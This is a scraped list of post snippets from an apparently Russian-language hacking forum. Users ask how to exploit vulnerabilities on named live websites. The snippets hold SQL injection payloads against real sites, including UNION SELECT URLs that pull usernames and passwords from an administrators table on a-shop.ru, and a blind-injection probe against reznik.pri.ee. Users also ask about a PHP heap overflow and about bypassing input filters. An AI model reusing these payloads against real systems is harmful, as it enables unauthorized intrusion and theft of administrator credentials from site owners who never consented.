Separate names with a comma.
Не актуально, человек нашелся...
Парни сканером нашел уязвимость: php html entity encoder heap overflow vulnerability, но нигде не могу найти инфу как ее юзать, кроме этого:...
Привет всем! Можно ли обойти вот такую защиту? Все параметры обрабатываются вот такой функцией:
всем привет! При обращении к скрипту (бeз параметров) вылетает куча таких ошибок, можно ли это как нибудь раскрутить?
ну доступа к нему нет, ошибка 403, проверял и на локалхосте и во всех сайтах с этим движком
Yuna а через какой скрипт Вы в usersearch.php параметры передавали? просто так его вызвать нельзя...
напиши что за XSS ты узал если не трудно...
забыл написать, если условие выполнится то страница загрузится без ошибок, если нет, то соответственно будет пустой...
эту скулю можно раскрутить толькоподбором, тоесть допустим делаем примерно такой запрс www.reznik.pri.ee/document.php?id=138 and exists (select...
а по подробнее можно? и в каких версиях?
можно ли пролезть вот в такую багу сайта? http://www.hotindex.ru/Details.aspx?id=6927
чар тоже не работает)), как быть?
Народ вот нашел уязвимость, судя по всему там стоит MSSQL, как дальше добить эту скулю не пойму, так как там нельзя использовать буквы...
http://www.a-shop.ru/product_info.php?products_id=-1'+union+select+concat(username,char(58),password) +from+administrators/*...
http://www.a-shop.ru/product_info.php?products_id=-1'+union+select+concat(username,char(58),password)+from+administrators/*...